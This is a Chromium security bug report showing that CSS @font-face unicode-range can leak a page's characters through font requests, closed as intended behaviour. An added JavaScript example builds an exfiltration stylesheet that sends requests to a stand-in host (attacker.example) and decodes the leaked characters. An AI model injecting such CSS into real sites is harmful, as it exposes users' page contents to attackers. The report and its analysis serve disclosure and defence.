
Issue 543078 link

Starred by 2 users

Issue metadata

Status: WontFix
Owner:
Closed: Oct 2015
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug-Security




@font-face unicode-range can be used as text reader

Reported by masatoki...@gmail.com, Oct 14 2015

Issue description

UserAgent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Steps to reproduce the problem:
[PoC 1]
1. Go to http://vulnerabledoma.in/poc_unicode-range.html .
2. See network tab of DevTools. You can see external requests including page text (M and K).

[PoC 2]
1. Go to http://vulnerabledoma.in/poc_unicode-range2.html .
2. See network tab of DevTools. You can see external requests including page text (M,a,s,t,o,K,i,n,u,g,w).

What is the expected behavior?

What went wrong?
Chrome fetches a font only if the target node contains characters within the range of the unicode-range descriptor.
I think this behavior exists to save bandwidth. But on the other hand, an attacker can read page text using only CSS.

As you can see in PoC 2, an attacker can't know duplicated characters. But in some cases, like this PoC, it can give an attacker enough information.

Did this work before? N/A 

Chrome version: 45.0.2454.101  Channel: stable
OS Version: 6.2 (Windows 8)
Flash Version: Shockwave Flash 19.0 r0

This bug is public:
https://twitter.com/kinugawamasato/status/650632206155517952
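The following JavaScript is an added example, not code from the bug report or from Chromium. It models the technique behind the two PoCs above: the attacker's injected stylesheet declares one @font-face per probed character, each with a single-code-point unicode-range and its own src URL, and a browser that loads a face only when the rendered text contains a code point in that range ends up telling the collector which characters the page contains. The collector host (attacker.example), the path layout and the probed alphabet are assumptions for the demo; the fetch simulation is a model of the lazy-loading behaviour the report describes, not Blink's actual loader.

```javascript
// Added example modelling the unicode-range leak; not from the bug report.
// Collector host, path scheme and alphabet are placeholders for the demo.

// Characters the attacker wants to probe for (an assumption for the demo).
const ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

// Build the injected stylesheet: one @font-face per character. All faces
// share one family name so a single font-family declaration on <body>
// makes every text node a candidate for every face.
function buildExfilCSS(alphabet, collectorBase) {
  const rules = [];
  for (const ch of alphabet) {
    const cp = ch.codePointAt(0).toString(16).toUpperCase();
    // The src URL encodes the probed code point; unicode-range restricts
    // the face to exactly that code point.
    rules.push(
      `@font-face { font-family: leak; src: url(${collectorBase}/${cp}); unicode-range: U+${cp}; }`
    );
  }
  rules.push("body { font-family: leak; }");
  return rules.join("\n");
}

// Recover (url, codePoint) pairs from the stylesheet so the simulator can
// apply the range check.
const RULE_RE = /src:\s*url\(([^)]+)\);\s*unicode-range:\s*U\+([0-9A-F]+)/g;

function parseRules(css) {
  const out = [];
  for (const m of css.matchAll(RULE_RE)) {
    out.push({ url: m[1], codePoint: parseInt(m[2], 16) });
  }
  return out;
}

// Model of the lazy-loading behaviour described in the report: a face is
// requested only if some character of the rendered text falls inside its
// unicode-range, and at most once per face. Returns the distinct URLs the
// browser would fetch. One request per face regardless of how often the
// character occurs is exactly why duplicates are invisible to the attacker.
// (Ordering here follows first occurrence in the text; a real browser's
// request order should not be relied on.)
function simulateFetches(pageText, css) {
  const byCodePoint = new Map(parseRules(css).map(r => [r.codePoint, r.url]));
  const fetched = [];
  const seen = new Set();
  for (const ch of pageText) {
    const url = byCodePoint.get(ch.codePointAt(0));
    if (url !== undefined && !seen.has(url)) {
      seen.add(url);
      fetched.push(url);
    }
  }
  return fetched;
}

// Collector side: map each request path back to the probed character.
// Only the set of characters present is learned, never their multiplicity.
function decodeLeak(urls) {
  return urls.map(u => String.fromCodePoint(parseInt(u.slice(u.lastIndexOf("/") + 1), 16)));
}

// End-to-end: what the collector learns about a page containing pageText.
function leakedChars(pageText, alphabet = ALPHABET) {
  const css = buildExfilCSS(alphabet, "https://attacker.example/f");
  return decodeLeak(simulateFetches(pageText, css)).join(",");
}

// Demo with constructed page text; mirrors the character list in PoC 2.
console.log(leakedChars("Masato Kinugawa"));
```

The model reproduces the report's observation that repeated characters collapse to one request: a page whose text is the reporter's name leaks M,a,s,t,o,K,i,n,u,g,w and nothing about how many times "a" appears. Because the leak rides entirely on font requests, a site that can be hit with CSS injection limits the damage by restricting where fonts may be loaded from (for example a Content-Security-Policy font-src allowlist that excludes attacker-controlled origins), which is consistent with the triage below treating this as a website-side issue.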
 

Comment 1 by och...@chromium.org, Oct 14 2015

Labels: Cr-Blink-Fonts Security_Impact-Stable Security_Severity-Low
Owner: ksakamoto@chromium.org
This does seem like an unfortunate side effect if an attacker is able to inject arbitrary CSS into a page. But even if that's the case it's more a vulnerability on the website's side (XSS) as opposed to a Chrome vulnerability. I'm not sure if we can do much here as it appears to be intended behaviour.

Looping in ksakamoto@ who implemented this for thoughts.
Labels: -Cr-Blink-Fonts Cr-Blink-WebFonts
Status: WontFix
I agree with ochang@.

Note that this behavior is spec'd in CSS Fonts Module Level 3 (although at the moment only Blink implements it correctly). See EXAMPLE 13 of http://www.w3.org/TR/css3-fonts/.

I'm pretty sure that the spec author gave some thought about this issue. You may want to discuss it on www-style W3C group.


Comment 3 by ClusterFuzz, Jan 21 2016

Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.

Comment 4 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 5 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
